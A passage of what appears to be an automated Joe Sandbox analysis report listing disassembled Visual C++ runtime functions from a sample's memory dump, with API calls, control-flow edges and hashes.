                                                                          • Instruction Fuzzy Hash: 86316470A4131CD9DB64BBB19D466FE72B4AF10B50F10442AF711AAC83EE788981BB50
                                                                          Function 000F261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 81 f261b-f263d HeapCreate 82 f263f-f2640 81->82 83 f2641-f264a 81->83
                                                                          APIs
                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 000F2630
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHeap
                                                                          • String ID:
                                                                          • API String ID: 10892065-0
                                                                          • Opcode ID: 0b2e8abb7e08251d1d18aaf9aef10a3ea0f70d46676f94fe613307c9f0167e54
                                                                          • Instruction ID: 17ddd440ea8e6cbb0d1fbc13da4fbb494f5b523d3d07c8e6265a1145ebccd2c4
                                                                          • Opcode Fuzzy Hash: 0b2e8abb7e08251d1d18aaf9aef10a3ea0f70d46676f94fe613307c9f0167e54
                                                                          • Instruction Fuzzy Hash: EED05E326543485EEB40AF71AC08B723BDCD384395F108435B90CC6A51EA78D591EE00
                                                                          Function 000F1465 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 84 f1465-f1476 call f143a ExitProcess
                                                                          APIs
                                                                            • Part of subcall function 000F143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,000F1472,?,?,000F54EE,000000FF,0000001E,?,000F36FC,?,00000001,?,?,000F2A2A,00000018), ref: 000F1444
                                                                            • Part of subcall function 000F143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000F1454
                                                                          • ExitProcess.KERNEL32 ref: 000F1476
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExitHandleModuleProcProcess
                                                                          • String ID:
                                                                          • API String ID: 75539706-0
                                                                          • Opcode ID: 98567c750071ea7ac17bed6f5476ef16aff1898d6a8caa5646b7aba26f084bc2
                                                                          • Instruction ID: 146902ab77f670d6e61325f9619c1367343ab1f0f08cbda5b6bcbdd33457ccbe
                                                                          • Opcode Fuzzy Hash: 98567c750071ea7ac17bed6f5476ef16aff1898d6a8caa5646b7aba26f084bc2
                                                                          • Instruction Fuzzy Hash: 90B04C31000108BB9B012B11DC098993F15EB80350B548010F51849421DE71A951AA94

                                                                          Non-executed Functions

                                                                          Function 000F2AE2 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 000F2BBE
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 000F2BC8
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 000F2BD5
                                                                          • GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 000F2BF0
                                                                          • TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 000F2BF7
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                          • String ID:
                                                                          • API String ID: 2579439406-0
                                                                          • Opcode ID: e3b88a48b95ff229e8a31d9112a490c38b943b3cceb1a5f28dc14395a70ce8c9
                                                                          • Instruction ID: b10b3b43c8c4f8d0e1612318219982d00e596e3c2069212049eb0e237fdc4d5f
                                                                          • Opcode Fuzzy Hash: e3b88a48b95ff229e8a31d9112a490c38b943b3cceb1a5f28dc14395a70ce8c9
                                                                          • Instruction Fuzzy Hash: E031D1B090122C9BDB60DF64DD897D8BBB8AF18304F5040EAE60CA6651EB785F84CF48
                                                                          Function 000F10CC Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32 ref: 000F1346
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000F135B
                                                                          • UnhandledExceptionFilter.KERNEL32(000F816C), ref: 000F1366
                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 000F1382
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 000F1389
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                          • String ID:
                                                                          • API String ID: 2579439406-0
                                                                          • Opcode ID: 7d112a2874adc74b0780167c428aff2af888539ae34a4f14e0796eb490a7f1f2
                                                                          • Instruction ID: c08634abc2aacac4c4b81de72c732cdf7dc012c6066febc6153f3b084594ac2c
                                                                          • Opcode Fuzzy Hash: 7d112a2874adc74b0780167c428aff2af888539ae34a4f14e0796eb490a7f1f2
                                                                          • Instruction Fuzzy Hash: 5921A2F4A01208DFE750DF64ED446B43BB4BB0A352B50801AE60E86F61DB7C6585EB46
                                                                          Function 000F248E Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 112libraryloadermemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 137 f248e-f24a0 GetModuleHandleW 138 f24a9-f24ad 137->138 139 f24a2-f24a8 call f13e1 137->139 141 f24b3-f24fa GetProcAddress * 4 138->141 142 f2611 call f21a8 138->142 139->138 144 f24fc-f2503 141->144 145 f2512-f2531 141->145 149 f2616 142->149 144->145 147 f2505-f250c 144->147 148 f2536-f2544 TlsAlloc 145->148 147->145 150 f250e-f2510 147->150 148->149 151 f254a-f2555 TlsSetValue 148->151 152 f2618-f261a 149->152 150->145 150->148 151->149 153 f255b-f25aa call f16cb call f207e * 4 call f2924 151->153 153->142 166 f25ac-f25c7 call f20f9 153->166 166->142 170 f25c9-f25db call f3730 166->170 170->142 173 f25dd-f25f4 call f20f9 170->173 173->142 177 f25f6-f260f call f21e5 GetCurrentThreadId 173->177 177->152
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 000F2498
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000F24BF
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000F24CC
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000F24D9
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000F24E6
                                                                          • TlsAlloc.KERNEL32 ref: 000F2536
                                                                          • TlsSetValue.KERNEL32(00000000), ref: 000F2551
                                                                          • GetCurrentThreadId.KERNEL32 ref: 000F2600
                                                                            • Part of subcall function 000F13E1: Sleep.KERNEL32(000003E8,00000000,?,000F2148,KERNEL32.DLL,?,000F2194,?,000F174F,00000003), ref: 000F13ED
                                                                            • Part of subcall function 000F13E1: GetModuleHandleW.KERNEL32(?,?,000F2148,KERNEL32.DLL,?,000F2194,?,000F174F,00000003,?,?,?,?,?,?,000F10F6), ref: 000F13F6
                                                                            • Part of subcall function 000F21A8: TlsFree.KERNEL32(0000000C,000F2616), ref: 000F21D3
                                                                            • Part of subcall function 000F21A8: DeleteCriticalSection.KERNEL32(00000000,00000000,KERNEL32.DLL,?,000F2616), ref: 000F298C
                                                                            • Part of subcall function 000F21A8: DeleteCriticalSection.KERNEL32(0000000C,KERNEL32.DLL,?,000F2616), ref: 000F29B6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteHandleModuleSection$AllocCurrentFreeSleepThreadValue
                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                          • API String ID: 3695068788-3819984048
                                                                          • Opcode ID: a4676cef01c8b0b8f2b2a10c7782082e840dc6b5630f875d892c71ed3f754dfd
                                                                          • Instruction ID: d837d9f23fe6a643637c19f5071b6a36d08d6fce2eb0eb755ba5ddea07a13480
                                                                          • Opcode Fuzzy Hash: a4676cef01c8b0b8f2b2a10c7782082e840dc6b5630f875d892c71ed3f754dfd
                                                                          • Instruction Fuzzy Hash: 39319F719017199AEB60AB74EE056B53BE4EB08B20B144429E704D3EB3EF7CA451FF90
                                                                          Function 000F6070 Relevance: 16.8, APIs: 11, Instructions: 340COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 180 f6070-f608f 181 f60c9-f60cc 180->181 182 f6091-f60aa LCMapStringW 180->182 185 f60ce-f60d1 181->185 186 f60f0-f60f8 181->186 183 f60ac-f60b2 182->183 184 f60b4-f60bd GetLastError 182->184 183->181 184->181 189 f60bf 184->189 190 f60d4-f60d7 185->190 187 f60fe-f6100 186->187 188 f62aa-f62b3 186->188 187->188 191 f6106-f6109 187->191 192 f62bd-f62c0 188->192 193 f62b5-f62ba 188->193 189->181 194 f60d9-f60dc 190->194 195 f60e1-f60ea 190->195 196 f610f-f6115 191->196 197 f62db-f62dd 191->197 198 f62ca-f62d9 call f6b1a 192->198 199 f62c2-f62c7 192->199 193->192 194->190 200 f60de 194->200 201 f60ed 195->201 202 f60ec 195->202 203 f611f-f6146 MultiByteToWideChar 196->203 204 f6117-f611c 196->204 206 f6403-f640c 197->206 198->197 213 f62e2-f62e5 198->213 199->198 200->195 201->186 202->201 203->197 207 f614c 203->207 204->203 208 f640e call f10cc 206->208 210 f614e-f6158 207->210 211 f6191 207->211 212 f6413-f6414 208->212 210->211 215 f615a-f6163 210->215 214 f6194-f6197 211->214 216 f62eb-f6305 call f6b63 213->216 217 f63c6-f63de LCMapStringA 213->217 214->197 218 f619d-f61b0 MultiByteToWideChar 214->218 219 f6178 215->219 220 f6165-f616e call f6aa0 215->220 216->197 237 f6307-f6320 LCMapStringA 216->237 221 f63e0-f63e3 217->221 223 f6299-f62a5 call f5446 218->223 224 f61b6-f61d1 LCMapStringW 218->224 228 f6179 call f54b5 219->228 244 f618c-f618f 220->244 245 f6170-f6176 220->245 226 f63ee-f63f3 221->226 227 f63e5-f63ed call f35ee 221->227 223->206 224->223 231 f61d7-f61de 224->231 235 f63f5-f63f8 226->235 236 f6401 226->236 227->226 234 f617e-f6181 228->234 242 f6209-f620b 231->242 243 f61e0-f61e3 231->243 234->244 247 f6183 234->247 235->236 238 f63fa-f6400 call f35ee 235->238 236->206 239 f6329 237->239 240 f6322-f6324 237->240 238->236 250 f632b-f632e 239->250 251 f6368 239->251 240->221 253 f620d-f6217 242->253 254 f6252 242->254 243->223 252 f61e9-f61ec 243->252 244->214 248 f6189 245->248 247->248 248->244 250->251 256 f6330-f6338 250->256 260 f636a-f636c 251->260 252->223 258 f61f2-f6204 LCMapStringW 252->258 253->254 259 f6219-f6222 253->259 257 f6254-f6256 254->257 261 f633a-f6343 call f6aa0 256->261 262 f6350 256->262 257->223 263 f6258-f626e LCMapStringW 257->263 258->223 264 f623a 259->264 265 f6224-f622d call f6aa0 259->265 260->240 266 f636e-f6392 call f5320 LCMapStringA 260->266 261->240 287 f6345-f634e 261->287 270 f6351 call f54b5 262->270 271 f6292-f6298 call f5446 263->271 272 f6270-f6275 263->272 268 f623b call f54b5 264->268 265->223 282 f622f-f6238 265->282 283 f6398-f63ba call f6b63 266->283 284 f6394-f6396 266->284 275 f6240-f6243 268->275 277 f6356-f6359 270->277 271->223 278 f627b-f627e 272->278 279 f6277-f6279 272->279 285 f624e-f6250 275->285 286 f6245-f624b 275->286 288 f635b-f6361 277->288 289 f6364-f6366 277->289 290 f6281-f628f WideCharToMultiByte 278->290 279->290 282->257 292 f63bd-f63c4 call f5446 283->292 284->292 285->257 286->285 287->260 288->289 289->260 290->271 292->221
                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(00000000,00000100,000F926C,00000001,00000000,00000000,00000100,?,00000000,?,?,?,?,?,?,00000000), ref: 000F60A2
                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,00000000), ref: 000F60B4
                                                                          • MultiByteToWideChar.KERNEL32(00000100,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,?,00000000), ref: 000F6140
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000), ref: 000F61AC
                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,00000000), ref: 000F61C8
                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?,?,00000000,?,?), ref: 000F6202
                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?,?,00000000,?,?), ref: 000F6266
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,?), ref: 000F6289
                                                                          • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,00000100,?,00000000,?,?,?,?), ref: 000F6319
                                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000100,?,00000000,?), ref: 000F638B
                                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,00000100,?,00000000,?,?,?,?,?,?,00000000), ref: 000F63D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1775797328-0
                                                                          • Opcode ID: 2d7bf5a3d9ca95a45ef7d8a2638e80ecb497c4acb61501a7036c10cdab75e0b0
                                                                          • Instruction ID: 8e35b1ceb10929b4ac3fc907a9c5fc20a30feca1926bb4d63e2ffc26260772e5
                                                                          • Opcode Fuzzy Hash: 2d7bf5a3d9ca95a45ef7d8a2638e80ecb497c4acb61501a7036c10cdab75e0b0
                                                                          • Instruction Fuzzy Hash: 12B17C7290011DAFDFA19FA4CC808BE7BB5FB48314B148529FB05A6961D7369DA0FB50
                                                                          Function 000F3213 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 297 f3213-f3230 call f20f0 300 f3236-f3245 LoadLibraryA 297->300 301 f32c4-f32cb 297->301 304 f324b-f325b GetProcAddress 300->304 305 f3375 300->305 302 f32cd-f32d3 301->302 303 f331c-f3323 301->303 302->303 308 f32d5-f32ee call f20f9 * 2 302->308 306 f3355-f3363 call f20f9 303->306 307 f3325-f332e call f20f9 303->307 304->305 309 f3261-f32ae call f207e GetProcAddress call f207e GetProcAddress call f207e GetProcAddress call f207e 304->309 310 f3377-f337b 305->310 306->305 319 f3365-f3373 306->319 307->306 320 f3330-f3337 307->320 308->303 327 f32f0-f32f2 308->327 309->301 337 f32b0-f32bf GetProcAddress call f207e 309->337 319->310 320->306 329 f3339-f3340 320->329 327->303 330 f32f4-f32f8 327->330 329->306 332 f3342-f334b call f20f9 329->332 339 f32fa-f330b 330->339 340 f3313-f331a 330->340 332->306 342 f334d-f3352 332->342 337->301 339->340 346 f330d-f3311 339->346 340->306 342->306 346->303 346->340
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(USER32.DLL,000FAFA8,00000000,00000314,?,000F1888,000FAFA8,Microsoft Visual C++ Runtime Library), ref: 000F323B
                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 000F3257
                                                                            • Part of subcall function 000F207E: TlsGetValue.KERNEL32(00000000,?,000F20F7,00000000,000F3223,000FAFA8,00000000,00000314,?,000F1888,000FAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000F2090
                                                                            • Part of subcall function 000F207E: TlsGetValue.KERNEL32(00000005,?,000F20F7,00000000,000F3223,000FAFA8,00000000,00000314,?,000F1888,000FAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000F20A7
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 000F3274
                                                                            • Part of subcall function 000F207E: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,000F20F7,00000000,000F3223,000FAFA8,00000000,00000314,?,000F1888,000FAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000F20BD
                                                                            • Part of subcall function 000F207E: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 000F20D8
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 000F3289
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 000F329E
                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 000F32B6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$Value$HandleLibraryLoadModule
                                                                          • String ID: GetProcessWindowStation$MessageBoxA$USER32.DLL
                                                                          • API String ID: 2739679353-2247880650
                                                                          • Opcode ID: 1beb8cdcb385d11bf845be1be7e192680ecccd7a7f6d64561fe2a9bfb4a1a5ce
                                                                          • Instruction ID: 909047edb5496ad280253490a754b64b6411fc393ac70e87d58e73744a0739bc
                                                                          • Opcode Fuzzy Hash: 1beb8cdcb385d11bf845be1be7e192680ecccd7a7f6d64561fe2a9bfb4a1a5ce
                                                                          • Instruction Fuzzy Hash: 75418A7290020EAAEB60ABB5DD45A7E7BE99B40360B240429F700D6D52DF7CDB40FB20
                                                                          Function 000F1719 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 161fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 347 f1719-f172a 348 f172d-f1734 347->348 349 f173f-f1742 348->349 350 f1736-f173d 348->350 351 f18bf-f18c3 349->351 352 f1748-f1753 call f35a3 349->352 350->348 350->349 355 f188d-f1899 GetStdHandle 352->355 356 f1759-f1763 call f35a3 352->356 355->351 357 f189b-f189e 355->357 362 f1765-f176c 356->362 363 f1772-f1778 356->363 357->351 359 f18a0-f18b9 call f34b0 WriteFile 357->359 359->351 362->355 362->363 363->351 365 f177e-f1799 call f353b 363->365 368 f179b-f17a5 call f2ae2 365->368 369 f17a8-f17c4 GetModuleFileNameA 365->369 368->369 371 f17ec-f17f7 call f34b0 369->371 372 f17c6-f17db call f353b 369->372 379 f17f9-f181e call f34b0 call f33f0 371->379 380 f1831 371->380 372->371 378 f17dd-f17e9 call f2ae2 372->378 378->371 379->380 392 f1820-f182f call f2ae2 379->392 381 f1833-f1844 call f337c 380->381 390 f1846-f1850 call f2ae2 381->390 391 f1853-f1869 call f337c 381->391 390->391 398 f186b-f1875 call f2ae2 391->398 399 f1878-f188b call f3213 391->399 392->381 398->399 399->351
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,000FAFC1,00000104), ref: 000F17BC
                                                                          • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,000F10F6,?), ref: 000F188F
                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,000F10F6,?), ref: 000F18B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandleModuleNameWrite
                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                          • API String ID: 3784150691-4022980321
                                                                          • Opcode ID: 174820e7b872c81677f38fcf25b6cfc80e2ba3e208ab652673f4c170d33687b8
                                                                          • Instruction ID: 5359b14c0729d059ca3385027ca2f24608662867f1ece87bd3076479902b0fd1
                                                                          • Opcode Fuzzy Hash: 174820e7b872c81677f38fcf25b6cfc80e2ba3e208ab652673f4c170d33687b8
                                                                          • Instruction Fuzzy Hash: BC413BB2A0420CB6E61176659C46FFF369C9B51BA0F140124FF0891D83FE69DB02B6F2
                                                                          Function 000F21E5 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 57libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,000F9458,0000000C,000F2320,00000000,00000000,?,000F174F,00000003,?,?,?,?,?,?,000F10F6), ref: 000F21F7
                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 000F222B
                                                                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 000F223B
                                                                          • InterlockedIncrement.KERNEL32(000FA4D8), ref: 000F226A
                                                                            • Part of subcall function 000F13E1: Sleep.KERNEL32(000003E8,00000000,?,000F2148,KERNEL32.DLL,?,000F2194,?,000F174F,00000003), ref: 000F13ED
                                                                            • Part of subcall function 000F13E1: GetModuleHandleW.KERNEL32(?,?,000F2148,KERNEL32.DLL,?,000F2194,?,000F174F,00000003,?,?,?,?,?,?,000F10F6), ref: 000F13F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc$IncrementInterlockedSleep
                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                          • API String ID: 3998264955-2843748187
                                                                          • Opcode ID: 2cb6d2428454125c51b203a6dfd648e03cf4697866b9237d120c3cf7bcb61888
                                                                          • Instruction ID: 93e698a09768a80243624c6619a9a6e093777a72f95040ed22a90115ff7b93e5
                                                                          • Opcode Fuzzy Hash: 2cb6d2428454125c51b203a6dfd648e03cf4697866b9237d120c3cf7bcb61888
                                                                          • Instruction Fuzzy Hash: 6E11F370900709EFD760EF75D845BFABBE0AF50310F108419E69997A91CF78A540EB11
                                                                          Function 000F3D2D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 428 f3d2d-f3d38 429 f3d3e-f3d51 InterlockedDecrement 428->429 430 f3dc1-f3dc5 428->430 431 f3d56-f3d5e 429->431 432 f3d53-f3d54 InterlockedDecrement 429->432 433 f3d63-f3d6b 431->433 434 f3d60-f3d61 InterlockedDecrement 431->434 432->431 435 f3d6d-f3d6e InterlockedDecrement 433->435 436 f3d70-f3d78 433->436 434->433 435->436 437 f3d7d-f3d80 436->437 438 f3d7a-f3d7b InterlockedDecrement 436->438 439 f3d87-f3d8e 437->439 438->437 440 f3d99-f3d9d 439->440 441 f3d90-f3d94 439->441 443 f3d9f-f3da4 440->443 444 f3da9-f3daf 440->444 441->440 442 f3d96-f3d97 InterlockedDecrement 441->442 442->440 443->444 445 f3da6-f3da7 InterlockedDecrement 443->445 444->439 446 f3db1-f3dc0 InterlockedDecrement 444->446 445->444 446->430
                                                                          APIs
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000F3D47
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000F3D54
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000F3D61
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000F3D6E
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000F3D7B
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000F3D97
                                                                          • InterlockedDecrement.KERNEL32(00000000), ref: 000F3DA7
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000F3DBD
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
